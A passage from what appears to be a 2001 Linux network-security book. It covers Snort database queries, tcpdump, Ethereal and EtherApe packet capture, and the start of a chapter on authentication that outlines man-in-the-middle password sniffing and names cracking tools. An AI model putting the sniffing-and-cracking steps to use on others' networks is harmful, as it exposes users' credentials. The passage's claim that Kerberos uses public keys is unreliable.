suspicious connections to +your network.If you are in the X Window environment,resize your ter- +minal so that you can see all of the information. +If Snort has logged a large number of packets,they will go off the +screen.Use the up and down arrow keys to scroll through the informa- +tion.When you are finished viewing a particular table,press Q to exit. +PostgreSQL also has a history feature,which allows you to scroll up to +view previous commands. +31. Now,create SQL queries to obtain only the information you want.Issue +the following commands: +SELECT * FROM iphdr WHERE cid=1 ; +SELECT * FROM iphdr WHERE cid>4 ; +SELECT * FROM iphdr WHERE cid>=4 ; +The first command obtains only the first row in the table.The cid +value is the “connection id”value,and it is always in sequential order. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 249 +Implementing an Intrusion Detection System • Chapter 4 249 +Figure 4.11 The iphdr Table +The second command obtains all rows after the fourth.The last com- +mand obtains the fourth row,as well as all of the ones above 4. +32. Now,obtain only the IP address information for the sending and +receiving host for the first three records: +SELECT sid, cid, ip_src0, ip_src1, ip_src2, ip_src3, ip_dst0, +ip_dst1, ip_dst2, ip_dst3 +FROM iphdr WHERE cid<3 ; +This command selects only certain columns from the iphdr table.If +your table does not have the first three rows,then find the appropriate +cid number and enter it here.Try the additional commands: +SELECT sid, cid, ip_src0, ip_src1, ip_src2, ip_src3, ip_dst0, +ip_dst1, ip_dst2, ip_dst3 +FROM iphdr WHERE cid>30 ; +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 250 +250 Chapter 4 • Implementing an Intrusion Detection System +SELECT cid, ip_dst1, ip_dst2, ip_dst3 FROM iphdr WHERE cid>40 ; +SELECT sid, cid, ip_src0, ip_src1, ip_src2, ip_src3, ip_dst0, +ip_dst1, ip_dst2, ip_dst3 +FROM iphdr WHERE cid<32 ; +SELECT cid, ip_dst0, ip_dst1, ip_dst2, ip_dst3 FROM iphdr WHERE +ip_src0=FIRSTIPFIELD +and ip_src1=SECONDIPFIELD and ip_src2=THIRDIPFIELD and +ip_src3=FOURTHIPFIELD ; +SELECT cid, ip_dst0, ip_dst1, ip_dst2, ip_dst3 FROM iphdr +WHERE ip_src0= +FIRSTIPFIELD +and ip_src1= SECONDIPFIELD and ip_src2= THIRDIPFIELD and +ip_src3 we-24-130-10-35.we.mediaone.net.1047 > +www.tcpdump.org.www: S 1722963211:1722963211(0) +The first section is the timestamp (23:20:26) followed by milliseconds +(.356520).The interface used to capture the packets is eth0.Next,the +source host is the we-24-130-10-35.we.mediaone.net.It is sending the +packet using its TCP port 1047.It is sending this packet to the destination +host www.tcpdump.org.The destination port is port 80,which is identi- +fied as www in the /etc/services file (the port number or port name can +be used).The S is a synchronize flag used in a TCP handshake.In this +case,it is the first SYN flag sent to the server.Therefore,the ISN for the +TCP connection is 1722963211.All sequence numbers for this TCP con- +nection will be based on this ISN.1722963211:1722953211 is also the +starting sequence number and the ending sequence number for this +packet.The (0) indicates that no data (in bytes) is sent with this packet.If +data had been sent with this packet,the ending sequence number would +have increased by the number of bytes sent. +7. Can you find any TCP handshakes in your packet capture? Identify the +basic elements of the packets you have captured using the previous step +as an example. +8. Next,capture only ARP packets on your network by entering the +following: +tcpdump –b arp +9. Capture ARP packets again,but specify the interface to use (eth0 is used +as an example): +tcpdump –i eth0 –b arp +10. Capture IP packets this time.Print the results with number only (no +DNS lookups required) and only capture 12 packets.To accomplish this +task,enter: +tcpdump –n ip –c 12 +Your screen may resemble Figure 5.13,depending on your network +traffic. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 279 +Troubleshooting the Network with Sniffers • Chapter 5 279 +Figure 5.13 Tcpdump Command Using Filters +11. Capture source and destination packets to another host on your net- +work.For example,enter: +tcpdump host [hostname] +12. Capture a specific type of packet on your interface.For example,enter: +tcpdump icmp –i eth0 +13. Finally,capture packets between your system and another system,such as +a Web server.For example,enter: +tcpdump –i eth0 [your_hostname] and www.tcpdump.org +You have learned the basics of tcpdump.You can apply this knowledge to all +sniffer programs because tcpdump is the basis for all sniffers.Because tcpdump is +difficult to analyze,and because the file size is flat,many network administrators +use graphical sniffers to determine network problems and to troubleshoot pos- +sible security threats.The remaining sniffers in this lesson are more user friendly +than tcpdump and will simplify the packet analysis process. +Configuring Ethereal to +Capture Network Packets +Ethereal is a graphical user interface (GUI) packet sniffer that is much easier to +use than tcpdump.It performs the same tasks as tcpdump,but in a user-friendly +format.Because Ethereal uses many of the same filters as tcpdump,it is essential +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 280 +280 Chapter 5 • Troubleshooting the Network with Sniffers +that you fully understand the tcpdump commands and filters,as they will be used +in Ethereal throughout this chapter and in your daily administrative work. +Ethereal is very flexible because it allows you to read capture files from other +programs,such as tcpdump,Network Associate Sniffer Basic and Sniffer Pro, +NetXRay (now Sniffer Basic),snoop,atmsnoop,Microsoft Network Monitor,and +Lucent/Ascend router debug output.When opening these files,Ethereal automat- +ically determines the file type. +Both Ethereal and tcpdump capture packets using the pcap library (libpcap). +Since they both use the pcap library syntax,they can share many of the same +commands,such as filtering options and primitives. +Ethereal uses the same screen format as other packet sniffers—if you learn +how to use Ethereal,you can apply your knowledge to any GUI sniffer.It divides +the screen into three panes.The top pane is used for packet summary.It typically +shows the summary of many different packets.The middle pane is a protocol tree, +which displays the OSI/RM layers of the selected packet in the summary pane. +The bottom pane is a hex dump.The hex dump displays the packet as it looks +when traveling across the physical wire.Figure 5.14 displays a random packet +capture of a network.Note that the pane sizes are adjustable. +Figure 5.14 Ethereal Panes +In Figure 5.15,an HTTP GET command is listed in the summary pane, +which is the top pane.It displays the basic data regarding the packet.In this case, +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 281 +Troubleshooting the Network with Sniffers • Chapter 5 281 +it states that the HTTP GET command will download the icann-logo.gif image +to the client’s Web browser. +Figure 5.15 Hex Code for an HTTP GET Command +The second pane displays the protocol tree for the packet.Each packet can be +expanded by selecting the + sign.You can discover a great deal about each packet +using the protocol tree,such as the hardware address of your host (Ethernet II +Source field) and your default gateway (Ethernet II Destination field),the TCP +port number and sequence numbers,and all Application layer activity.Expand +each protocol to learn more about the packet. +The third pane displays the hexadecimal format of the packet,which is how it +appears when traveling over the wire.If you highlight a line in the protocol tree, +the corresponding hex code will appear in the hex pane,as shown in Figure 5.15. +Ethereal Options +Unlike tcpdump,Ethereal options are run before the packet capture occurs (in +most cases).The options are run at the command line before the program runs. +For example,at the command line you would enter: +ethereal [options] +The program will run using the options you specify.For example,if you +wanted Ethereal to use numbers instead of host names to avoid DNS lookups, +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 282 +282 Chapter 5 • Troubleshooting the Network with Sniffers +you would specify this as an option at the command line before the program runs. +The Ethereal options are listed in Table 5.6. +Table 5.6 Ethereal Options +Option Description +-c Defines the default number of packets to capture. +-f Defines the filter expression to use for all captures. +-h Displays the version number and available options. +-i Defines the interface to use for all captures. +-k Instructs Ethereal to start the packet capture immediately. If the +interface is not defined, Ethereal (similar to tcpdump) uses the +lowest number interface (excluding the loopback). +-m Defines the font for Ethereal text. +-n Disables names in Ethereal so only numbers will be used. This +disables DNS lookups, as well as TCP and UDP port names. +-r Instructs Ethereal to display a packet capture within a file. +-R Allows you to apply a packet filter to a file. Any packet that does +not apply to the filter is removed from the display. +-s Defines the default length, in bytes, of each packet capture. +-t Defines the timestamp format. There are three choices: +Absolute ( a ) Actual time and date the packet is captured. +Delta ( d ) The time since the last packet was captured. +Relative ( r ) The time since the first packet was captured in the +current packet capture. +By default, the relative timestamp format is used. +-w Defines the default packet capture filename. +NOTE +When determining the timestamp format to use, consider the purpose of +your packet capture. If you are determining the performance response +time of a server, the delta timestamp is ideal because it will indicate how +long it takes a server to respond to a client request. If you are deter- +mining a possible attack, you may want to use absolute timestamp to +document the date and time an attack took place. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 283 +Troubleshooting the Network with Sniffers • Chapter 5 283 +Ethereal Filters +Ethereal filters are similar to the filters in tcpdump.The easiest way to apply fil- +ters is to open the program using the ethereal command at the command line, +and then using the GUI to navigate to the filter configuration screen.You can +then use the same filters used in tcpdump.The only difference is that you will +not enter tcpdump before the filter specifications. +Once benefit of Ethereal is that you can easily save your filters and access +them as needed for each packet capture you make.You can have multiple filters +from which to choose for different needs.For example,one filter might be used +for capturing packets between two hosts,while another is used to capture ICMP +packets on the network for troubleshooting purposes. +To learn more about filter syntax,please consult the Ethereal and/or tcpdump +man page. +Configuring Ethereal and Capturing Packets +The following steps will teach you how to configure Ethereal and capture packets +on your network.Your system may already have a version of Ethereal installed.If +you require the latest version of Ethereal,you should visit the Ethereal Web site at +www.ethereal.com and download the latest version.(This RPM is also available +on the CD accompanying this book (ethereal-0.8.9-4.i386.rpm).The Ethereal +Web site is shown in Figure 5.16. +Figure 5.16 The Ethereal Download Site +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 284 +284 Chapter 5 • Troubleshooting the Network with Sniffers +If you are using Red Hat Linux,you can use the files on the CD or down- +load the latest RPM at www.redhat.com/apps/download and perform a search +for keyword ethereal.The latest RPM is usually several versions behind the latest +Ethereal Web site version.To install Ethereal,complete the following steps: +1. Verify that the Ethereal RPM is installed on your system by entering: +rpm –qa | grep ethereal +2. If you do not receive a reply,such as ethereal-8.x-x,you need to down- +load and install Ethereal. +3. Once you have verified that Ethereal is installed,you are ready to +capture packets. +4. To add filters to Ethereal,open a command interface and enter: +ethereal +5. Select the Edit menu,and choose Filters.The Ethereal:Filters screen +appears,as shown in Figure 5.17.Since no filters have been configured, +the configuration screen is blank. +Figure 5.17 Ethereal Filter Configuration Screen +6. To create a filter that allows only traffic between your host and another +host,you must add a filter name and a filter string.For example,to create +a filter between your host and the Web server at the ICANN +(192.0.34.65),enter the filter name and filter string shown in Figure 5.18. +Enter your IP address,not the 24.130.11.35 address listed in Figure 5.18. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 285 +Troubleshooting the Network with Sniffers • Chapter 5 285 +Figure 5.18 Creating a Filter between Two Hosts +NOTE +The filter string in Ethereal is the same primitive used in tcpdump. Both +Ethereal and tcpdump use libpcap, which allows them to share many of +the same filter configurations. +7. This filter will only capture packets with a source or destination address +that matches 24.130.11.35 (the IP address of my system) and 192.0.34.65 +(the IP address of the ICANN Web server).Please note that we could +have also listed the host names (we-24-130-11-35.we.mediaone.net and +www.icann.org). +8. After the two fields are complete,click Save,and then click New.Your +filter will appear in the filter field,as shown in Figure 5.19. +Figure 5.19 Completing the Filter Creation Process +9. Click OK to return to Ethereal.You can add additional filters,such as an +ICMP filter,by repeating the process.Your new filter will appear in the +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 286 +286 Chapter 5 • Troubleshooting the Network with Sniffers +Ethereal:Filter screen directly beneath the ICANN Web Server Filter. +Each new filter will simply be added to the list,as shown in Figure 5.20. +Figure 5.20 Adding Multiple Filters +10. To add the filter to a packet capture,you need to specify the filter.You +can do this before or after the packet capture occurs.For example,to +apply the filter before the capture,simply select the Capture menu and +choose Start.The Capture Preference screen appears,as shown in +Figure 5.21.Click Filter and choose the filter that you want to apply.In +Figure 5.21,the ICMP filter was chosen. +Figure 5.21 Ethereal Capture Preferences +Notice that the Update list of packets in real time and Enable +name resolution check boxes are selected.This ensures that packets are +displayed as they are captured (i.e.,“live”),instead of displaying them +only when the capture is complete.The Enable name resolution +check box will display host names,as well as protocol names.You can +also disable name resolution at the command line by entering ethereal +–n when you run Ethereal,or by deselecting the Enable name +resolution check box in the Capture Preferences screen. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 287 +Troubleshooting the Network with Sniffers • Chapter 5 287 +11. After you select the desired filter,click OK and the capture starts. +Packets appear as they are captured so you can analyze the traffic on +your network in real time.When you capture several packets,click Stop. +12. The packet capture appears in Ethereal.Your screen may resemble +Figure 5.22,which shows Router solicitation packets and echo request +and replies on the network. +Figure 5.22 Ethereal Packet Capture with Filter Applied +NOTE +Ethereal can take a long time to process packets after you stop the cap- +ture. Be patient. You may have to wait up to a minute for the captured +packets to display properly. You may lose your capture if you interrupt +Ethereal before it displays the packets. +13. Apply the host filter you created in Step 6 to filter only traffic between +your host and another host (i.e.,a server). +14. Create your own filters and apply them to a packet capture.Use the +filter techniques you learned in the tcpdump section,especially the +primitives in Tables 5.4 and 5.5. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 288 +288 Chapter 5 • Troubleshooting the Network with Sniffers +As you can see,the GUI provided by Ethereal allows administrators to view +detailed information about each packet.The protocol tree is especially helpful in +determining the purpose of each protocol within the packet.The combination of +Ethereal and tcpdump provides administrators with almost all of their sniffer +needs on Linux systems. +Viewing Network Traffic +between Hosts Using EtherApe +EtherApe is a graphical network traffic-monitoring tool.Unlike Ethereal, +EtherApe displays networking activity graphically by identifying hosts and the +links that exist between the hosts.The links are color coded and change constantly +as the host connections change.It displays real -time traffic,as well as traffic saved +to a file.Visit the EtherApe home page at http://etherape.sourceforge.net,shown +in Figure 5.23. +Figure 5.23 EtherApe Home Page +As you can see,EtherApe supports Ethernet,Fiber Distributed Data Interface +(FDDI),PPP,and SLIP devices,and is capable of reading network traffic live and +from a file.It can also save network traffic and display it later.The program uses +GNU Network Object Model Environment (GNOME) libraries for the inter- +face.Similar to tcpdump and Ethereal,EtherApe uses libpcap,the library for +packet capturing and filtering. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 289 +Troubleshooting the Network with Sniffers • Chapter 5 289 +EtherApe uses the command-line options listed in Table 5.7.Enter these +options as needed when you run the program.Use the format: +etherape [options] +Table 5.7 EtherApe Options +Option Name Description +-d Diagram only Do not display diagram text. +-f Filter Define a specific capture filter. +-F No fade Do not allow old links to fade in diagram. +-i Interface Define the interface for EtherApe to listen for +network traffic. +-L Link color Define the color of the diagram links. +-m Mode Define the operation mode. You can choose +from the following: +ethernet +fddi +ip +tcp +By default, the lowest level is used for the +device. +-n Numeric Disables names so that only numbers will be +used. This disables DNS lookups, as well as TCP +and UDP port names. +-n Text color Define the color of the diagram nodes. +-r Infile Defines the input file. +-T Text color Define the color of the diagram text. +-? Help Display help message. +Configuring EtherApe and +Viewing Network Traffic +The following steps will teach you how to configure EtherApe and view traffic +on your network.Your system may already have a version of EtherApe installed.If +you require the latest version of EtherApe,you should visit the EtherApe Web +site at http://etherape.source-forge.net and download the latest version. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 290 +290 Chapter 5 • Troubleshooting the Network with Sniffers +If you are using Red Hat Linux,you can download the latest RPM at +www.redhat.com/apps/download and perform a search for keyword EtherApe. +(This RPM is also available on the CD accompanying this book:etherape-0.5.6- +4.i386.rpm.) To install EtherApe,complete the following steps: +1. Verify that the EtherApe RPM is installed on your system by entering: +rpm –qa | grep etherape +2. If you do not receive a reply,such as etherape-0.5.x-x,you need to +download and install EtherApe. +3. Once you have verified EtherApe is installed,you are ready to capture +packets. +4. To open EtherApe,open a command interface and enter: +etherape +5. EtherApe opens and displays the network traffic diagram by default.If +you are running Red Hat Linux 7,the diagram text is unreadable.You +must select a font in order to read the text.To select a font,click +Preferences on the EtherApe toolbar.The EtherApe Preference screen +appears,as shown in Figure 5.24. +Figure 5.24 EtherApe Preferences: Choosing a Readable Font +(If Necessary) +6. Click Font and choose a font;for example,Helvetica or Times New +Roman.Click Save so you will not have to do this again,and then +click OK. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 291 +Troubleshooting the Network with Sniffers • Chapter 5 291 +7. The network traffic diagram now appears with readable network +addresses,as shown in Figure 5.25. +Figure 5.25 Ethernet Traffic on EtherApe +8. By default,EtherApe diagrams the lowest-layer protocols,which are +Ethernet protocols.If you are diagramming a busy network,ARP +packets may quickly overrun your diagram.To diagram IP traffic instead, +exit EtherApe.At the command line,enter: +etherape –m ip +This command opens EtherApe in IP mode,which will display the +IP addresses and host names on your network,as shown in Figure 5.26. +Figure 5.26 EtherApe in IP Mode +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 292 +292 Chapter 5 • Troubleshooting the Network with Sniffers +9. Experiment with the filter field by clicking Preferences and selecting +the Capture tab.Using the Capture filter field,create an end-to-end +IP filter or a port-to-port TCP filter. +As you can see,EtherApe offers a graphical representation of your network +traffic.Instead of displaying individual packets,it creates a diagram of network +traffic links between hosts.EtherApe used in conjunction with tcpdump,and +Ethereal provides a complete toolkit for a network administrator. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 293 +Troubleshooting the Network with Sniffers • Chapter 5 293 +Summary +In this chapter,you learned that a sniffer,or packet sniffer,is software or hardware +that captures network traffic.This traffic can be analyzed to determine problems +in a network,such as bottlenecks or performance degradation.It can also confirm +hacker attacks against your network systems.If you suspect a system is under +attack,you can capture the packets on its interface to identify what types of +packets are hitting the system,as well as where the packets originated.Once a +problem is determined,an administrator can make network changes to ensure +that the network operates efficiently and securely. +You learned about three different programs that capture packets using the +pcap library (libpcap),as well as the importance of identifying packet functions. +For example,you learned about the function of a TCP handshake,how to identify +one,and its importance on TCP/IP networks. +Tcpdump is a command-line network traffic-monitoring tool that prints out +packet headers on a network interface and allows administrators to analyze the +results.Because tcpdump is a command-line tool,analyzing the results can be dif- +ficult.Options are used in tcpdump to filter the amount of packets your system +captures.Without them,administrators can be overwhelmed by the number of +packets that tcpdump prints.An expression determines from which network hosts +you will capture data.If you do not specify an expression,all packets on the net- +work between all hosts will be printed.An expression will ensure that only the +data you require,such as the IP traffic between your interface and a specific host, +will be printed. +Ethereal is a graphical user interface (GUI) packet sniffer that is much easier +to use than tcpdump.It performs the same tasks as tcpdump,but in a user- +friendly format.Ethereal uses the same screen format as other packet sniffers.If +you learn how to use Ethereal,you can apply your knowledge to any GUI +sniffer.It divides the screen into three panes.The top pane is used for packet +summary,and typically shows the summary of many different packets.The middle +pane is a protocol tree,which displays the OSI/RM layers of the selected packet +in the summary pane.The bottom pane is a hex dump.The hex dump displays +the packet as it looks when traveling across the physical wire. +EtherApe is a graphical network traffic-monitoring tool.Unlike Ethereal, +EtherApe displays networking activity graphically by identifying hosts and the +links that exist between the hosts.The links are color coded and change con- +stantly as the host connections change. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 294 +294 Chapter 5 • Troubleshooting the Network with Sniffers +EtherApe used in conjunction with tcpdump and Ethereal provides a com- +plete toolkit for a network administrator.All three packet-capturing tools provide +troubleshooting assistance for network problems,and can be used to identify +potential security problems on your network.You will use these tools throughout +this book,so it is important that you have an understanding of their functionality. +Solutions Fast Track +Understanding Packet Analysis and TCP Handshakes +(cid:59) Analyzing TCP traffic is one of the most important tasks for a security +administrator.It can tell you a great deal about your network connec- +tions,as well as identify many denial-of-service (DoS) attacks and man- +in-the-middle,or hijacking,attacks. +(cid:59) A TCP handshake must occur whenever two hosts establish a connec- +tion on a TCP/IP network.This handshake consists of rules that the two +hosts must follow. +(cid:59) Special mechanisms,called flags,are used to establish and terminate a +TCP connection.Flags are included in the TCP header,and each flag +completes a different function in the TCP handshake.The flags used are +SYN,FIN,RST,PSH,ACK,and URG. +Creating Filters Using Tcpdump +(cid:59) Tcpdump captures packets on a given interface,or on all interfaces on a +system,for analysis.It is a command-line tool,which can make it diffi- +cult to read. +(cid:59) Tcpdump options allow you to filter the packets that are captured.For +example,you can limit the capture to ARP packets or display only IP +addresses (not host names). +(cid:59) Tcpdump expressions allow you to specify the hosts from which you +will capture packets.For example,an expression will ensure that only the +data you require,such as the traffic between your interface and a specific +host,will be printed. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 295 +Troubleshooting the Network with Sniffers • Chapter 5 295 +Configuring Ethereal to Capture Network Packets +(cid:59) Ethereal provides a GUI environment for capturing network packets, +which makes it easier for many administrators to use. +(cid:59) Ethereal and tcpdump capture packets using the pcap library (libpcap). +Since they both use the pcap library (libpcap) syntax,they can share +many of the same commands,such as filtering options and primitives. +(cid:59) You can easily save Ethereal filters and access them as needed for each +packet capture you make.You can have multiple filters from which to +choose for different needs. +Viewing Network Traffic +between Hosts Using EtherApe +(cid:59) EtherApe is a GUI that displays networking activity graphically by iden- +tifying hosts and the links that exist between the hosts.It displays real- +time traffic,as well as traffic saved to a file. +(cid:59) EtherApe also uses the pcap library (libpcap),the library for packet cap- +turing and filtering,which is similar to tcpdump and Ethereal. +(cid:59) EtherApe uses options to specify the capture information,such as the +interface,link colors,or whether names or numbers will be used. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 296 +296 Chapter 5 • Troubleshooting the Network with Sniffers +Frequently Asked Questions +The following Frequently Asked Questions, answered by the authors of this book, +are designed to both measure your understanding of the concepts presented in +this chapter and to assist you with real-life implementation of these concepts. To +have your questions about this chapter answered by the author, browse to +www.syngress.com/solutions and click on the “Ask the Author” form. +Q: How does a sniffer eavesdrop the traffic on a network? +A: Ethernet was designed as a shared network since all systems share the same +physical wire.It was designed so that systems would ignore all traffic that was +not addressed to a particular system’s hardware address.Sniffer,or wiretap, +programs turn off this filter,and switch a system’s interface into promiscuous +mode,which then views all packets on the same physical wire. +Q: Now that I can sniff network traffic,how can I stop people from sniffing +my data? +A:As you have learned,packet sniffing is a powerful tool.It allows malicious +hackers to capture packets that contain passwords and usernames.The only +way to protect yourself against hackers with packet sniffers is to encrypt your +data.Even if hackers capture your encrypted data,they will be unable to +decrypt it (unless they are extremely determined). +Q:When I use Ethereal,the only TCP packets I can capture are those to and +from my interface.Why? +A:Your network interface card (NIC) probably has not switched to promiscuous +mode for the packet capture.Promiscuous mode forces an interface to supply +all network packets it sees to a host.Your operating system may be unable to +switch your interface to promiscuous mode,or your interface may not sup- +port promiscuous mode.If your interface cannot be put into promiscuous +mode,you will only see TCP traffic addressed to your interface,link-layer +addresses,broadcast and multicast packets.Try another interface for your +packet captures. +Q:When I perform a live capture in Linux,Ethereal freezes.Why? +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 297 +Troubleshooting the Network with Sniffers • Chapter 5 297 +A:This problem was fixed in Ethereal 0.8.2 and later.Ethereal would freeze +during a live capture because of the libpcap library.If the network was idle, +libpcap was unable to return control to Ethereal,and Ethereal would freeze. +Code was added to Ethereal to fix this issue. +Q:When I use EtherApe,the hosts move before I can identify them.How can I +keep them on my screen for analysis? +A:You must set the node timeout to zero (0),or else the hosts will disappear +after they are finished transmitting their data. +Q: I installed EtherApe,but the diagram host names and addresses are a garbled +mess.I can’t read anything. +A:You must configure the font.When EtherApe is running,click Preferences. +In the Diagram tab,click Font,and choose a font such as Helvetica or +Times New Roman.Make sure you click Save so you avoid this problem +in the future. +www.syngress.com + +138_linux_05 6/20/01 9:41 AM Page 298 + +138_linux_06 6/20/01 9:43 AM Page 299 +Chapter 6 +Network +Authentication and +Encryption +Solutions in this chapter: +(cid:2) Understanding Network Authentication +(cid:2) Creating Authentication and +Encryption Solutions +(cid:2) Implementing One-Time Passwords +(OTP and OPIE) +(cid:2) Implementing Kerberos Version 5 +(cid:2) Using kadmin and Creating Kerberos +Client Passwords +(cid:2) Establishing Kerberos Client Trust +Relationships with kadmin +(cid:2) Logging On to a Kerberos Host Daemon +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +299 + +138_linux_06 6/20/01 9:43 AM Page 300 +300 Chapter 6 • Network Authentication and Encryption +Introduction +You have seen in previous chapters how the open source community has created +powerful sniffing tools.You have seen how they can be used either to administer +your network or to attack it.Because these sniffing tools are open source,and +because it is relatively easy to place a Linux host on your company network,you +need to consider ways to minimize improper use of packet capturing tools. +Encryption solutions,such as Secure Shell (SSH) and enhanced authentication +schemes such as one-time passwords (OTP) and Kerberos version 5 (v5),are +common solutions to this problem.In this chapter,you will learn about how to +implement one-time passwords,as well as how to implement Kerberos v5 realms. +These will help you reduce sniffing attacks.In future chapters,you will then learn +more about how to encrypt transmissions using SSH and IPSec.But,before you +do this,it is important to review the concepts of network authentication and +how many current implementations leave themselves open to attack. +Understanding Network Authentication +The traditional way to log on to servers is to provide a username and password +pair as authentication tokens (credentials).The client first presents these creden- +tials by sending them across the network to a server.The server then compares +this information to its own database,then allows or denies access to system +resources,depending upon the results of the comparison.Up until about the last +ten years,this process had been considered quite effective and secure.Due to the +increased sophistication of network tools (as well as hackers that may use them), +this traditional practice has become less tenable. +Still,users very commonly authenticate over the Internet using clear text +passwords.Increasing amounts of people are working at home and logging on to +remote e-mail and File Transfer Protocol (FTP) servers using passwords,all of +which are sent in clear text.Such practices can only invite sniffing attacks that +can lead to compromised user accounts and network servers. +Even if employees remain behind the firewall,many system services allow +clear text authentication,including the following: +(cid:2) Telnet +(cid:2) FTP +(cid:2) Standard Network Information Service (NIS) +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 301 +Network Authentication and Encryption • Chapter 6 301 +With relatively little expertise,an attacker can obtain authentication informa- +tion quite simply.About ten years ago,most operating system vendors implemented +encryption as a way to thwart sniffing attacks. +Attacking Encrypted Protocols +Encrypting the packets certainly seemed to be the answer to sniffing attacks.It +stopped all but the most resourceful users from even trying to decrypt such proto- +cols.Within the past five years,however,even encrypted transmissions such as +Windows NT Server Message Blocks (SMBs,also known as the Common +Internet File System [CIFS]),have become susceptible to attacks,because many +versions of SMB/CIFS still send passwords.Although they are encrypted,the pass- +words are still sent across the network,which is a problem because attacking +encrypted protocols has become much easier.Many tools exist that help hackers +wage a sniffing attack,which is a type of “man-in-the-middle”attack,where a +“sniffing host”that resides in-between two systems captures the information.All +the sniffing host operator has to do is place her Network Interface Card (NIC) +into promiscuous mode to be able to capture encrypted information (such as pass- +words and ensuing transmissions passing between hosts).Figure 6.1 shows how a +“sniffing host”can sit in-between two systems and obtain encrypted information. +Figure 6.1 Conducting a Man-in-the-Middle Attack +System A +#$@ +Sniffing Host +##87 +( +5 +En +l5 +c +S +ry +,k +p r t & ed # 0 +D +5 +a +9 +ta +1 +) +-= 383.vzpodf9074& +@ +# +The Sniffing Host can obtain passwords +as they cross over the network. In some +cases, it does not matter if the passwords +are encrypted or not. +System B +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 302 +302 Chapter 6 • Network Authentication and Encryption +After a hacker obtains encrypted data,he can still act on it.The hacker will +need more than a simple packet sniffer,of course.Still,it is now possible to cull +passwords and other information from these packets.The specific steps of a man- +in-the-middle attack,described in Figure 6.2,apply to encrypted packets as much +as they do packets sent in clear text. +Figure 6.2 Steps for Obtaining Network Passwords +1: Grab the packets +from the network. +2: Isolate the encrypted +password. +3: Run a cracking +application against it. +After the packets containing the encrypted passwords are captured,hackers +use cracking applications such as L0phtCrack (www.securitysoftwaretech +.com/lc3),John the Ripper (http://packetstorm.securify.com),and others.All of +these are designed to crack passwords after they are obtained.Some,such as +L0phtCrack,are designed to both capture and crack sniffed encrypted passwords. +Hackers create or find new resources and use more powerful computers all of the +time.In order to secure your network more fully,you should consider finding a +strategy that makes it even more difficult to capture and decrypt passwords. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 303 +Network Authentication and Encryption • Chapter 6 303 +Tools & Traps… +Man-in-the-Middle Attacks +Man-in-the-middle attacks come in several varieties. Sniffing attacks are +simply the most popular form. Other man-in-the-middle attacks include +the following: +(cid:2) Replay Where the attacker captures network packets, stores +them, then resends them out onto the network. Sometimes, +an attacker can obtain a login sequence, which can then be +used repeatedly to log in. +(cid:2) Insertion When the attacker isolates a data stream and then +injects arbitrary packets into it. Most of the time, such +attacks are meant to annoy Internet Relay Chat (IRC) and +Telnet users, but more sophisticated insertion attacks occur. +Some programs are able to insert bogus packets into net- +work transmissions to help evade network-based Intrusion +Detection System (IDS) applications. Insertion attacks are not +limited to just the network data stream, either. For example, +versions of Microsoft Word are susceptible to an attack that +allows a malicious user to insert information into a document +that can cause Word to execute arbitrary code on the system. +For more information, consult the following URL: +http://packetstorm.securify.com/0001-exploits/mo2.htm. +Creating Authentication +and Encryption Solutions +When it comes to authenticating safely,you have two options: +(cid:2) Find a way to authenticate without sending passwords across the net- +work.In modern networks,Kerberos is the best way to do this.Kerberos +is a scheme that allows hosts to communicate using public keys.It +ensures that no passwords whatsoever traverse the network. +(cid:2) Find a way to discard any password that is sent across the network. The +accepted phrase for this strategy is one-time passwords (OTP).This strategy +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 304 +304 Chapter 6 • Network Authentication and Encryption +requires that the client and the server cooperate to ensure that once a +password that traverses the network is used,it is never used again. +You should also understand that it is important to encrypt the transmissions +that occur after authentication.Kerberos has the added ability to encrypt trans- +missions once authentication occurs.The use of OTP,however,does not encrypt +subsequent transmissions.OTP is usually much easier to implement than +Kerberos,however.Here are some additional ways to encrypt transmissions in +addition to avoiding sending passwords across the Internet. +(cid:2) Secure Sockets Layer (SSL) This protocol is designed to provide “on +the fly”encryption by inserting a special layer on top of the transport +layer of the Open System Interconnection Reference Model +(OSI/RM).It uses public and private keys to establish a session that,the- +oretically at least,is readable only between a client and a server. +(cid:2) Secure Shell (SSH) This protocol encrypts the data stream,and it also +allows for authentication using public keys.Using a server (SSHD) and a +client (SSH),users can communicate with hosts much like using Telnet. +Unlike Telnet,however,SSH is encrypted and allows users to authenti- +cate without having passwords cross the Internet. +(cid:2) IPSec (IP Security Architecture) An add-on to IP that provides +encryption and authentication at the network layer of the OSI/RM.This +encryption occurs “on the fly”between properly configured systems. +Except for one-time passwords,all of these solutions use public key encryp- +tion to try to create a secure data pipe in an open,insecure network. +SECURITY ALERT! +Even protocols such as SSH are not immune to attacks. For example, in +1998 the then-current version of SSH was vulnerable to an attack that +allows a malicious user to forge and insert invalid packets into the data +stream, resulting in decryption of the data stream. Although the problem +was corrected, this example shows that even the most secure protocols +can be attacked. +Now that you understand some of the ways to secure network data,let’s take +a closer look at one-time passwords and Kerberos,the two authentication options +discussed earlier. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 305 +Network Authentication and Encryption • Chapter 6 305 +Implementing One-Time +Passwords (OTP and OPIE) +In the Linux world,the most universal way to implement 